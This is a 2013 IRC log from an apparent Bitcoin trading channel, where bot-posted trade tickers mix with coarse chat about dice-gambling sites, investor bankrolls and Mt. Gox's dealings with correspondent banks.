Jun 21 04:23:49 bitcoin4life Jun 21 04:24:20 I never understood the interest in watching sports... Jun 21 04:24:37 depnds on a sports Jun 21 04:24:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.028899 BTC [-] Jun 21 04:24:53 Play sports, yes... just watch... It's boring, like reality TV shows. Jun 21 04:25:04 if I want to watch a black dude bouncing balls up and down a court I get a mirror Jun 21 04:25:19 [BTCTC] [TAT.ASICMINER] 12 @ 0.0289 = 0.3468 BTC [+] Jun 21 04:25:42 [BTCTC] [ASICMINER-PT] 2 @ 2.898 = 5.796 BTC [+] Jun 21 04:27:14 [BTCTC] [ASICMINER-PT] 2 @ 2.8989 = 5.7978 BTC [+] Jun 21 04:27:27 [MPEX] [X.IDIFF.SEP] 240 @ 0.55 = 132 BTC [+] Jun 21 04:27:40 There is an artistry to the pinnacle of sport Jun 21 04:30:17 https://109.201.133.65/index.php?topic=127130.0 Jun 21 04:30:19 check this shit out. Jun 21 04:30:23 Well I never found it quite impressive. Unless maybe some rare moments... but show me only the best feats. Jun 21 04:30:29 archival ? there's one post left out of what, 10-20 pages Jun 21 04:30:36 and it's bny a guy scamtagged Jun 21 04:30:47 Otherwise, I'll skip the countless hours consisting the rest of the games. Jun 21 04:36:32 What is this activity stat that popped up, replacing post count? Jun 21 04:36:59 no idea Jun 21 04:40:25 [BTCTC] [ASICMINER-PT] 1 @ 2.8979 BTC [-] Jun 21 04:42:28 [BTCTC] [S.MPOE-PT] 2 @ 0.000768 = 0.0015 BTC [+] Jun 21 04:43:19 this is retarded http://datenform.de/blog/dead-drops-preview/ Jun 21 04:44:06 [BTCTC] [ASICMINER-PT] 3 @ 2.859 = 8.577 BTC [-] Jun 21 04:44:07 [BTCTC] [ASICMINER-PT] 1 @ 2.858 BTC [-] Jun 21 04:44:07 [BTCTC] [ASICMINER-PT] 1 @ 2.855 BTC [-] Jun 21 04:44:08 [BTCTC] [ASICMINER-PT] 1 @ 2.8501 BTC [-] Jun 21 04:44:10 [BTCTC] [ASICMINER-PT] 1 @ 2.8501 BTC [-] Jun 21 04:44:14 [BTCTC] [ASICMINER-PT] 7 @ 2.85 = 19.95 BTC [-] Jun 21 04:45:34 no acrtually its a good idea. Jun 21 04:45:44 sorta like a gloryhole for laptops. Jun 21 04:46:26 I'm gonna plant a bunch of them wired up to mains power Jun 21 04:46:35 think of the viruses you can catch doing that Jun 21 04:46:49 use linux. Jun 21 04:46:54 well thats best case yeah Jun 21 04:47:13 already do Jun 21 04:47:48 tempted by mac these days tho -- get the BSD environment plus the bright and shiny Jun 21 04:48:25 i thought he was referencinh the viruses from sticking your dick in glory hole Jun 21 04:48:29 point being, if every brick in a wall contains an usb unit Jun 21 04:48:35 good luck mpaa-ing Jun 21 04:48:47 jborkl_ was meant as a bit of a pun, yes Jun 21 04:48:57 i know Jun 21 04:49:15 aknap3: theres just the looking like a tool problem Jun 21 04:49:45 well there ought to be a few people here who have experience coping with that Jun 21 04:49:53 maybe they can help Jun 21 04:51:24 tbh you lost me at BSD Jun 21 04:51:44 I'd rather stick my dick in a blender Jun 21 04:52:06 [BTCTC] [ASICMINER-PT] 1 @ 2.8979 BTC [+] Jun 21 04:52:08 [BTCTC] [ASICMINER-PT] 1 @ 2.898 BTC [+] Jun 21 04:52:09 [BTCTC] [ASICMINER-PT] 1 @ 2.8989 BTC [+] Jun 21 04:52:13 [BTCTC] [ASICMINER-PT] 7 @ 2.8989 = 20.2923 BTC [+] Jun 21 04:52:47 <[\\\]> I hear that's all the rage these days Jun 21 04:53:16 I have now lost 20BTC at just-dice Jun 21 04:53:21 jesus christ Jun 21 04:53:52 you can just hold down a hotkey and bet continuously Jun 21 04:55:20 i prefer hornet's nests Jun 21 04:55:37 vegans Jun 21 04:56:15 church of appliantology members Jun 21 04:57:25 [HAVELOCK] [ASICM] 1 @ 0.02845 BTC [-] Jun 21 05:02:45 [HAVELOCK] [ASICM] 2 @ 0.0281201 = 0.0562 BTC [-] Jun 21 05:05:01 bug powder do you have a link? ripplebandit may need an upgrade. Jun 21 05:08:04 I just found it apparently bugpowder can't answer because he's still betting. Jun 21 05:08:19 [BTCTC] [BTC-BOND] 3 @ 0.00983 = 0.0295 BTC [-] Jun 21 05:08:30 what?!? Jun 21 05:08:37 link for what Jun 21 05:08:41 I was betting Jun 21 05:09:53 https://just-dice.com Jun 21 05:11:43 [BTCTC] [TAT.ASICMINER] 17 @ 0.028201 = 0.4794 BTC [-] Jun 21 05:17:17 I think S.DICE is dead Jun 21 05:17:27 Thanks bugpowder. Wow that site looks fun. Jun 21 05:17:28 just-dice is so much better Jun 21 05:17:42 and the big worry always was the betting pool Jun 21 05:17:51 but dooglus has crowdsourced it Jun 21 05:17:58 its semi-genius Jun 21 05:18:06 [HAVELOCK] [ASICM] 23 @ 0.02812011 = 0.6468 BTC [+] Jun 21 05:18:07 [HAVELOCK] [ASICM] 6 @ 0.0281201 = 0.1687 BTC [-] Jun 21 05:18:08 [HAVELOCK] [ASICM] 48 @ 0.02812001 = 1.3498 BTC [-] Jun 21 05:18:10 [HAVELOCK] [ASICM] 2 @ 0.02812 = 0.0562 BTC [-] Jun 21 05:18:11 [HAVELOCK] [ASICM] 19 @ 0.028101 = 0.5339 BTC [-] Jun 21 05:18:12 [HAVELOCK] [ASICM] 1 @ 0.0281 BTC [-] Jun 21 05:18:12 [HAVELOCK] [ASICM] 1 @ 0.0281 BTC [-] Jun 21 05:18:15 in less than 24 hours, betting pool is up to 1600BTC Jun 21 05:18:21 Betting pool? Jun 21 05:18:23 with 1% of pool as max profit Jun 21 05:18:28 Link, please? Jun 21 05:18:29 the BTC backing the site Jun 21 05:18:33 [BTCTC] [TAT.ASICMINER] 44 @ 0.028201 = 1.2408 BTC [-] Jun 21 05:18:38 https://just-dice.com Jun 21 05:19:00 Ah. The site simply doesn't load in my browser so I can't see anything except HTML2.0 style buttons and crap. Jun 21 05:19:05 oh weird Jun 21 05:19:09 what browser? Jun 21 05:19:16 IE something. Jun 21 05:19:26 its pretty slick Jun 21 05:19:29 there are hotkeys Jun 21 05:19:42 for changing the betting, odds, and rolling Jun 21 05:19:48 roll over or under your number Jun 21 05:19:53 arbitrary odds Jun 21 05:19:55 chatbox Jun 21 05:19:59 http://i.imgur.com/QHvMf5s.png Jun 21 05:20:04 and you can bet up to 50x/sec Jun 21 05:20:09 with javascript Jun 21 05:20:10 That's what I see. Not very slick... :-( Jun 21 05:20:25 lolwut Jun 21 05:20:58 I'm sure it's great. I don't gamble so no worries, just wondered what the dooglus was up to :-) Jun 21 05:21:17 Also, I have become convinced that erik wants to kill S.DICE Jun 21 05:21:43 The legal risk is outweighing his additional cashout oppotunities Jun 21 05:21:54 this is why he hasn't responded to the competition. Jun 21 05:22:44 [BTCTC] [TAT.VIRTUALMINE] 69 @ 0.005567 = 0.3841 BTC [+] Jun 21 05:22:56 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005567 = 0.2784 BTC [+] Jun 21 05:33:47 o, it's dooglus' thing ? Jun 21 05:35:18 It looks so weird on that screenshot, furuknap Jun 21 05:35:22 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.005577 = 0.0558 BTC [+] Jun 21 05:35:36 I prefer Coinroll. Almost the same thing. Jun 21 05:36:13 Coinroll now has more bets than SD (bets count, not volume) Jun 21 05:36:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005751 = 0.0115 BTC [+] Jun 21 05:37:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005787 BTC [+] Jun 21 05:38:00 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0058 = 0.0174 BTC [+] Jun 21 05:38:17 Does coinroll have a trollbox? Jun 21 05:38:29 that is key for the full casino experience Jun 21 05:40:34 No trollbox Jun 21 05:40:53 Maybe it requires one! Jun 21 05:41:31 so basically dooglus makes 1% of 1% Jun 21 05:41:35 Try just-dice... Doog is giving away .01BTC to all new users Jun 21 05:41:46 mircea_popescu: Yes, and whatever he has backing as well Jun 21 05:41:48 if 1mn is bet on jd his take is 100btc, and this is gross Jun 21 05:41:50 he has 250BTC in it Jun 21 05:42:01 so he gets about 15% now Jun 21 05:42:10 plus 1% of 1% of volume Jun 21 05:42:16 I think he should take 5% of the profits Jun 21 05:42:21 but I'm not complaining Jun 21 05:42:24 no point in mixing his capital in there. Jun 21 05:42:31 well Jun 21 05:42:37 I think it made sense for the first few hours Jun 21 05:42:45 but then I sniffed out an opportunity Jun 21 05:42:55 and helped out the funding level Jun 21 05:43:07 How much you put in? Jun 21 05:43:09 i mean. calculating the profit for the thing is distinct from calculating his investment roi Jun 21 05:43:13 no point mixing the two Jun 21 05:43:27 I made 10% on ROI between 2-5am while I slept Jun 21 05:43:34 lucky run though Jun 21 05:43:46 I'm sure others will dilute my share Jun 21 05:43:54 I've forwarded your suggestion as such to Scrat, Bugpowder Jun 21 05:43:54 already has happened Jun 21 05:43:54 i think the variance from noob investors going in/out might prove too much to handle. Jun 21 05:44:01 [22:41] Bugpowder suggests Coinroll needs a trollbox (chatbox) Jun 21 05:44:01 [22:42] For all the bragging, insulting, jestering and idle chatter needs of the Internet populace. Jun 21 05:44:07 the genius idea is actually a very bad idea, but anyway. Jun 21 05:44:25 why is it bad? Jun 21 05:44:38 it certainly doesn't maximize Doogs profit Jun 21 05:44:50 it will wreck the site. Jun 21 05:44:50 but I think it is optimal for other investors Jun 21 05:44:53 how so? Jun 21 05:45:08 the casino needs money one time and one time only : when it just lost. Jun 21 05:45:17 this model ensures he has money one time and one time only : when it just won. Jun 21 05:45:22 total mismatch. Jun 21 05:45:29 I dont think so Jun 21 05:45:45 If douglus doesn't get 100% of profits to put back in the bankroll, it keeps him from raising it if no new investors come in. And investors get away with most of the profits. Jun 21 05:45:46 what can i tell you. Jun 21 05:46:06 100% profits are distributed proportionally and instantly after each bet Jun 21 05:46:09 into the bankroll Jun 21 05:46:12 to idiots, basically. Jun 21 05:46:26 your theory about s.dice may be correct. if it is, erik fucked up. Jun 21 05:46:35 the same will happen here, but not because dooglus fucks up Jun 21 05:46:41 because dooglus has no control over it. Jun 21 05:46:57 The max profit on the bet is 1% of the roll Jun 21 05:46:58 Erik was supposed to have account based option long ago... he has to update. Jun 21 05:47:12 Erik had the money to innovate Jun 21 05:47:24 he chose not to, maybe because of no competiton Jun 21 05:47:33 but now there is comp Jun 21 05:47:44 much better sties Jun 21 05:47:44 These new dice games require only a single payment, and retain the provably fair element. Then people can spam the bet button 10 times a second. Quite addictive. Jun 21 05:48:05 S.DICE is running on momentum, and established trust Jun 21 05:48:12 and possibly Eriks bots Jun 21 05:49:06 Coinroll/PrimeDice have had about 15000 BTC monthly betting volume, each. Jun 21 05:49:32 That's significant albeit a small share of SD betting volume. Jun 21 05:49:53 For new websites, it's decent. Jun 21 05:51:44 Lebron is redic Jun 21 05:52:45 [HAVELOCK] [ASICM] 2 @ 0.02848799 = 0.057 BTC [+] Jun 21 05:56:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.02889 = 0.1156 BTC [+] Jun 21 05:57:59 [BTCTC] [S.MPOE-PT] 1 @ 0.00071 BTC [-] Jun 21 05:59:09 GoMaD GordonG3kko Grishnakh Guest20671 Guest47245 Guest78679 guruvan gyovanni Jun 21 05:59:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005804 BTC [+] Jun 21 06:02:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.028301 = 1.4151 BTC [-] Jun 21 06:04:46 [BTCTC] [DMS.MINING] 126 @ 0.017987 = 2.2664 BTC [-] Jun 21 06:04:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0283 = 0.283 BTC [-] Jun 21 06:05:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.0283 = 0.1981 BTC [-] Jun 21 06:05:34 [BTCTC] [PAJKA.BOND] 12 @ 0.045 = 0.54 BTC [+] Jun 21 06:05:45 [HAVELOCK] [ASICM] 2 @ 0.028105 = 0.0562 BTC [-] Jun 21 06:08:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.0283 = 0.1981 BTC [-] Jun 21 06:11:52 [BTCTC] [TAT.ASICMINER] 17 @ 0.028884 = 0.491 BTC [+] Jun 21 06:12:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.028885 = 0.2022 BTC [+] Jun 21 06:12:30 [HAVELOCK] [ASICM] 2 @ 0.02810003 = 0.0562 BTC [-] Jun 21 06:12:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.028886 = 0.1444 BTC [+] Jun 21 06:14:56 [HAVELOCK] [ASICM] 1 @ 0.02810002 BTC [-] Jun 21 06:16:07 [BTCTC] [BASIC-MINING] 1 @ 1.359999 BTC [+] Jun 21 06:16:11 [BTCTC] [BASIC-MINING] 1 @ 1.359999 BTC [+] Jun 21 06:18:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.02835 = 0.1134 BTC [-] Jun 21 06:19:41 [BTCTC] [PAJKA.BOND] 2 @ 0.05 = 0.1 BTC [+] Jun 21 06:23:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.028884 BTC [+] Jun 21 06:24:29 [HAVELOCK] [ASICM] 7 @ 0.02810001 = 0.1967 BTC [-] Jun 21 06:27:13 [BTCTC] [ASICMINER-PT] 2 @ 2.88 = 5.76 BTC [-] Jun 21 06:28:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.028883 = 0.0866 BTC [-] Jun 21 06:28:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.028883 = 0.2311 BTC [-] Jun 21 06:30:19 [BTCTC] [ASICMINER-PT] 1 @ 2.8979 BTC [+] Jun 21 06:30:27 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.005804 = 0.2844 BTC [+] Jun 21 06:30:47 ;;ticker Jun 21 06:31:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.028883 BTC [-] Jun 21 06:32:30 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Jun 21 06:33:11 did power figures for BFL single come out? Jun 21 06:34:22 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Jun 21 06:39:56 [HAVELOCK] [KCIM] 6 @ 1.019 = 6.114 BTC [-] Jun 21 06:40:17 [BTCTC] [TAT.ASICMINER] 11 @ 0.028883 = 0.3177 BTC [-] Jun 21 06:40:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.028883 = 0.0578 BTC [-] Jun 21 06:41:35 [BTCTC] [COGNITIVE] 3 @ 0.259999 = 0.78 BTC [-] Jun 21 06:42:05 [HAVELOCK] [ASICM] 8 @ 0.02845 = 0.2276 BTC [+] Jun 21 06:42:07 [HAVELOCK] [ASICM] 42 @ 0.028469 = 1.1957 BTC [+] Jun 21 06:43:12 [BTCTC] [B.YABMC] 20 @ 0.009999 = 0.2 BTC [-] Jun 21 06:44:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.02888 = 0.5776 BTC [-] Jun 21 06:45:38 [BTCTC] [PAJKA.BOND] 4 @ 0.05 = 0.2 BTC [+] **** BEGIN LOGGING AT Fri Jun 21 14:40:28 2013 Jun 21 14:44:28 must be nice to be mircea_popescu Jun 21 14:44:57 hm ? Jun 21 14:45:22 [HAVELOCK] [ASICM] 133 @ 0.02954998 = 3.9301 BTC [-] Jun 21 14:45:24 [HAVELOCK] [ASICM] 124 @ 0.02954999 = 3.6642 BTC [+] Jun 21 14:45:25 [HAVELOCK] [ASICM] 414 @ 0.02955 = 12.2337 BTC [+] Jun 21 14:46:58 80 million or something Jun 21 14:48:34 5% steak Jun 21 14:48:59 [BTCTC] [B.YABMC] 17 @ 0.008011 = 0.1362 BTC [-] Jun 21 14:49:01 [BTCTC] [B.YABMC] 25 @ 0.00801 = 0.2003 BTC [-] Jun 21 14:49:12 [BTCTC] [B.YABMC] 3 @ 0.00801 = 0.024 BTC [-] Jun 21 14:49:17 well it was 1/4 bn earlier thisd year Jun 21 14:49:24 or w/e Jun 21 14:49:49 [BTCTC] [B.YABMC] 3 @ 0.008001 = 0.024 BTC [-] Jun 21 14:54:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0298 = 0.0596 BTC [-] Jun 21 14:56:09 [BTCTC] [BITVPS] 21 @ 0.001582 = 0.0332 BTC [-] Jun 21 14:56:11 [BTCTC] [BITVPS] 10 @ 0.001583 = 0.0158 BTC [+] Jun 21 14:57:07 [MPEX] [S.MPOE] 9250 @ 0.00077521 = 7.1707 BTC [-] Jun 21 15:05:20 [BTCTC] [TAT.ASICMINER] 115 @ 0.0298 = 3.427 BTC [-] Jun 21 15:06:13 [HAVELOCK] [ASICM] 1 @ 0.02955 BTC [+] Jun 21 15:06:22 [BTCTC] [BASIC-MINING] 1 @ 1.11001 BTC [+] Jun 21 15:09:14 [BTCTC] [RSM] 100 @ 0.022 = 2.2 BTC [-] Jun 21 15:09:16 [BTCTC] [RSM] 10 @ 0.021001 = 0.21 BTC [-] Jun 21 15:09:17 [BTCTC] [RSM] 100 @ 0.021 = 2.1 BTC [-] Jun 21 15:09:19 [BTCTC] [RSM] 58 @ 0.020016 = 1.1609 BTC [-] Jun 21 15:09:20 [BTCTC] [RSM] 1 @ 0.020013 BTC [-] Jun 21 15:09:22 [BTCTC] [RSM] 1 @ 0.020012 BTC [-] Jun 21 15:09:24 [BTCTC] [RSM] 1 @ 0.020011 BTC [-] Jun 21 15:09:27 [BTCTC] [RSM] 5 @ 0.02001 = 0.1001 BTC [-] Jun 21 15:09:29 [BTCTC] [RSM] 10 @ 0.020009 = 0.2001 BTC [-] Jun 21 15:09:30 [BTCTC] [RSM] 14 @ 0.02 = 0.28 BTC [-] Jun 21 15:10:04 [BTCTC] [RSM] 86 @ 0.02 = 1.72 BTC [-] Jun 21 15:12:12 man this thread is my favourite thing https://bitcointalk.org/index.php?topic=238474.0 Jun 21 15:14:13 crazy escalation on page 7. Blah blah blah blah. .... The only bitch I see is the one gargleing pedophile cum while he slams wordz onto the screen with his man boobs he earned playing hours of WoW. Jun 21 15:14:23 wait what ?! Jun 21 15:14:36 emo rage into a purple jizz pool of unicorn cum about completely unreasonable shit Jun 21 15:14:48 [BTCTC] [ASICMINER-PT] 1 @ 2.9849 BTC [+] Jun 21 15:14:49 [BTCTC] [ASICMINER-PT] 2 @ 2.985 = 5.97 BTC [+] Jun 21 15:14:53 [BTCTC] [ASICMINER-PT] 4 @ 2.986 = 11.944 BTC [+] Jun 21 15:16:12 [BTCTC] [ASICMINER-PT] 22 @ 2.986 = 65.692 BTC [+] Jun 21 15:16:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.0298 = 1.49 BTC [-] Jun 21 15:17:44 [HAVELOCK] [ASICM] 47 @ 0.02955 = 1.3889 BTC [+] Jun 21 15:17:53 [HAVELOCK] [ASICM] 200 @ 0.0296 = 5.92 BTC [+] Jun 21 15:19:01 [BTCTC] [TAT.ASICMINER] 33 @ 0.0298 = 0.9834 BTC [-] Jun 21 15:19:09 [BTCTC] [DMS.MINING] 8 @ 0.0179 = 0.1432 BTC [-] Jun 21 15:20:12 [BTCTC] [ASICMINER-PT] 1 @ 2.986 BTC [+] Jun 21 15:20:18 http://www.youtube.com/watch?v=KStasSCh3Ks Jun 21 15:20:52 [HAVELOCK] [ASICM] 6 @ 0.0298 = 0.1788 BTC [+] Jun 21 15:23:56 [BTCTC] [RSM] 10 @ 0.0229 = 0.229 BTC [+] Jun 21 15:23:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [-] Jun 21 15:24:00 [BTCTC] [ASICMINER-PT] 2 @ 2.986 = 5.972 BTC [+] Jun 21 15:24:57 [BTCTC] [RSM] 1 @ 0.0196 BTC [-] Jun 21 15:24:58 [BTCTC] [RSM] 100 @ 0.0195 = 1.95 BTC [-] Jun 21 15:29:27 [BTCTC] [COGNITIVE] 1 @ 0.285928 BTC [+] Jun 21 15:29:47 [HAVELOCK] [ASICM] 1 @ 0.029999 BTC [+] Jun 21 15:30:04 [HAVELOCK] [ASICM] 1 @ 0.029999 BTC [+] Jun 21 15:30:28 [HAVELOCK] [ASICM] 1 @ 0.029999 BTC [+] Jun 21 15:30:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.0299 = 0.2093 BTC [+] Jun 21 15:30:50 [BTCTC] [TAT.ASICMINER] 25 @ 0.0299 = 0.7475 BTC [+] Jun 21 15:31:36 [HAVELOCK] [ASICM] 2 @ 0.029999 = 0.06 BTC [+] Jun 21 15:32:04 [BTCTC] [ASICMINER-PT] 4 @ 2.986 = 11.944 BTC [+] Jun 21 15:32:07 [BTCTC] [TAT.ASICMINER] 66 @ 0.0299 = 1.9734 BTC [+] Jun 21 15:32:58 [BTCTC] [TAT.ASICMINER] 17 @ 0.0299 = 0.5083 BTC [+] Jun 21 15:33:01 [HAVELOCK] [SDICE] 12 @ 0.216989 = 2.6039 BTC [-] Jun 21 15:33:42 dub kinda lulzy Jun 21 15:34:03 [BTCTC] [TAT.ASICMINER] 16 @ 0.029311 = 0.469 BTC [-] Jun 21 15:34:41 [BTCTC] [ASICMINER-PT] 1 @ 2.986 BTC [+] Jun 21 15:35:01 "PS: I came damn near to tearing your apology to pieces, but now can't, you fuckin' lucky bastard. " Jun 21 15:35:30 [BTCTC] [RSM] 3 @ 0.022989 = 0.069 BTC [+] Jun 21 15:36:01 [BTCTC] [ASICMINER-PT] 1 @ 2.988 BTC [+] Jun 21 15:40:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0299 BTC [+] Jun 21 15:42:33 [HAVELOCK] [ASICM] 2 @ 0.029999 = 0.06 BTC [+] Jun 21 15:42:38 [HAVELOCK] [ASICM] 2 @ 0.029999 = 0.06 BTC [+] Jun 21 15:43:41 [HAVELOCK] [ASICM] 1 @ 0.029999 BTC [+] Jun 21 15:44:15 [BTCTC] [ASICMINER-PT] 2 @ 2.988 = 5.976 BTC [+] Jun 21 15:44:25 [BTCTC] [ASICMINER-PT] 2 @ 2.99 = 5.98 BTC [+] Jun 21 15:44:27 [BTCTC] [ASICMINER-PT] 3 @ 2.992 = 8.976 BTC [+] Jun 21 15:44:29 [BTCTC] [ASICMINER-PT] 1 @ 2.994 BTC [+] Jun 21 15:44:30 [HAVELOCK] [ASICM] 2 @ 0.0299999 = 0.06 BTC [+] Jun 21 15:44:36 [BTCTC] [ASICMINER-PT] 23 @ 2.997 = 68.931 BTC [+] Jun 21 15:45:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.029311 BTC [-] Jun 21 15:46:00 [BTCTC] [ASICMINER-PT] 2 @ 2.998877 = 5.9978 BTC [+] Jun 21 15:46:04 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Jun 21 15:46:13 there it is Jun 21 15:47:28 [BTCTC] [GSDPT] 7 @ 0.002586 = 0.0181 BTC [-] Jun 21 15:47:52 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Jun 21 15:48:17 [BTCTC] [ASICMINER-PT] 1 @ 2.9725 BTC [-] Jun 21 15:48:19 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [+] Jun 21 15:48:21 [BTCTC] [ASICMINER-PT] 9 @ 3 = 27 BTC [+] Jun 21 15:48:25 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Jun 21 15:48:32 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Jun 21 15:48:41 looks like the mtgox lolfest is starting to make some sense Jun 21 15:48:54 why? Jun 21 15:49:13 seems it is actually the correspondent banks that prevent international USD wires from going through Jun 21 15:49:24 [BTCTC] [ASICMINER-PT] 1 @ 3.06 BTC [+] Jun 21 15:49:31 which makes perfect sense if you understand how international wires work Jun 21 15:49:39 oh Jun 21 15:50:01 [BTCTC] [BASIC-MINING] 1 @ 1.11001 BTC [+] Jun 21 15:50:31 so: "can I give you money?" "no" Jun 21 15:51:07 [BTCTC] [TAT.ASICMINER] 16 @ 0.029899 = 0.4784 BTC [+] Jun 21 15:51:10 [BTCTC] [TAT.ASICMINER] 19 @ 0.029899 = 0.5681 BTC [+] Jun 21 15:51:12 [BTCTC] [TAT.ASICMINER] 45 @ 0.0299 = 1.3455 BTC [+] Jun 21 15:51:16 [BTCTC] [BITVPS] 100 @ 0.0016 = 0.16 BTC [+] Jun 21 15:51:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.0299 = 0.0598 BTC [+] Jun 21 15:52:30 [BTCTC] [TAT.ASICMINER] 66 @ 0.0299 = 1.9734 BTC [+] Jun 21 15:53:23 [BTCTC] [S.MPOE-PT] 20 @ 0.000769 = 0.0154 BTC [+] Jun 21 15:53:25 [BTCTC] [TAT.ASICMINER] 65 @ 0.0299 = 1.9435 BTC [+] Jun 21 15:53:28 [BTCTC] [S.MPOE-PT] 844 @ 0.00077 = 0.6499 BTC [+] Jun 21 15:54:37 pankkake more like "so you're marked for death" "yeah" Jun 21 15:54:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.0299 = 0.299 BTC [+] Jun 21 15:54:44 [BTCTC] [ASICMINER-PT] 1 @ 3.079 BTC [+] Jun 21 15:54:46 [BTCTC] [ASICMINER-PT] 1 @ 3.08 BTC [+] Jun 21 15:54:54 [BTCTC] [ASICMINER-PT] 8 @ 3.1 = 24.8 BTC [+] Jun 21 15:54:56 bs collapsed on the POSSIBILITY of banks refusing their correspondence. Jun 21 15:56:00 mircea_popescu: howso Jun 21 15:56:01 bs? Jun 21 15:56:28 wow Jun 21 15:57:12 [BTCTC] [ASICMINER-PT] 22 @ 3.099 = 68.178 BTC [-] Jun 21 15:57:14 what do you mean how so. how so tho which part. Jun 21 15:57:32 pankkake bs as in Bear Stearns Jun 21 15:58:39 [HAVELOCK] [ASICM] 2 @ 0.02981 = 0.0596 BTC [-] Jun 21 15:58:40 [HAVELOCK] [ASICM] 20 @ 0.0298 = 0.596 BTC [-] Jun 21 15:58:42 [HAVELOCK] [ASICM] 30 @ 0.02965 = 0.8895 BTC [-] Jun 21 15:58:43 [HAVELOCK] [ASICM] 19 @ 0.0296 = 0.5624 BTC [-] Jun 21 15:59:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.029899 BTC [-] Jun 21 15:59:12 [BTCTC] [TAT.ASICMINER] 16 @ 0.03 = 0.48 BTC [+] Jun 21 15:59:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Jun 21 15:59:16 [BTCTC] [TAT.ASICMINER] 211 @ 0.03 = 6.33 BTC [+] Jun 21 15:59:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Jun 21 15:59:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.03 = 0.3 BTC [+] Jun 21 15:59:31 [BTCTC] [TAT.ASICMINER] 44 @ 0.03 = 1.32 BTC [+] Jun 21 15:59:52 mircea_popescu: howso, in "what do you mean? the correspondent bank thing is bs and that theory collapsed? or did you mean something else?" Jun 21 16:00:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Jun 21 16:00:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [+] Jun 21 16:00:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.031 = 0.31 BTC [+] Jun 21 16:00:37 bear stearns was a highly leveraged and thus risky money handler. Jun 21 16:00:44 [BTCTC] [TAT.ASICMINER] 32 @ 0.03149 = 1.0077 BTC [+] Jun 21 16:00:50 correspondence in this context means accepting someone's promises to pay. Jun 21 16:00:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.0315 = 0.3465 BTC [+] Jun 21 16:01:03 the other banks were possibly going to stop corresponding with bs Jun 21 16:01:08 oh, TAT.AM @ 0.03 Jun 21 16:01:08 which led to it's immediate collapse. Jun 21 16:01:25 mtgox is an exotic and therefore risky money handler. Jun 21 16:01:30 <@assbot> [BTCTC] [ASICMINER-PT] 8 @ 3.1 = 24.8 BTC [+] Jun 21 16:01:34 the us banks are currently refusing its correspondence Jun 21 16:01:42 possibly on the grounds of the doj indictment Jun 21 16:03:14 [HAVELOCK] [ASICM] 12 @ 0.03 = 0.36 BTC [+] Jun 21 16:03:16 [BTCTC] [ASICMINER-PT] 1 @ 3.0001 BTC [-] Jun 21 16:03:20 [BTCTC] [ASICMINER-PT] 2 @ 3 = 6 BTC [-] Jun 21 16:04:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.03189 = 0.1913 BTC [+] Jun 21 16:04:20 mircea_popescu: not sure about that, they don't accept mtgox's correspondence directly, but the correspondence of the jp bank Jun 21 16:04:31 [BTCTC] [ASICMINER-PT] 1 @ 3.002346 BTC [+] Jun 21 16:04:45 no, actually. they're not going to cut out mizuho Jun 21 16:05:04 buit they ARE cutting mtgox's stuff. sooner or later mizuho will have to say sorry you can't bank here. Jun 21 16:05:10 and that's probably the reason their USD assets abroad didn't get frozen, because they're not in mtgox's name, but pooled by the mizuho at some random correspondent Jun 21 16:06:20 nobody said they're going to cut out mizuho, i'm saying that it's technically possible for correspondents to filter out mtgox's flows but not possible to freeze the assets since they are probably pooled by mizuho on a US account at one/many of their correspondent(s) Jun 21 16:06:21 i doubt it. Jun 21 16:06:51 [HAVELOCK] [ASICM] 3 @ 0.03 = 0.09 BTC [+] Jun 21 16:07:20 that the funds are pooled? Jun 21 16:07:23 yeah. Jun 21 16:07:28 [BTCTC] [ASICMINER-PT] 3 @ 2.999 = 8.997 BTC [-] Jun 21 16:07:58 why woudln't they be ? that's exactly the kind of stuff banks do, take money, pool it together and decide what belongs to whom based on their books Jun 21 16:08:19 and that's the exact regulatory crux faced by exchanges, at least in europe Jun 21 16:08:39 yeah but it;s also a slightly different point. Jun 21 16:08:50 proceed Jun 21 16:09:24 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Jun 21 16:09:40 currently mizuho is eating a lot of overhead handling the mtgox situation, exactly because the reporting 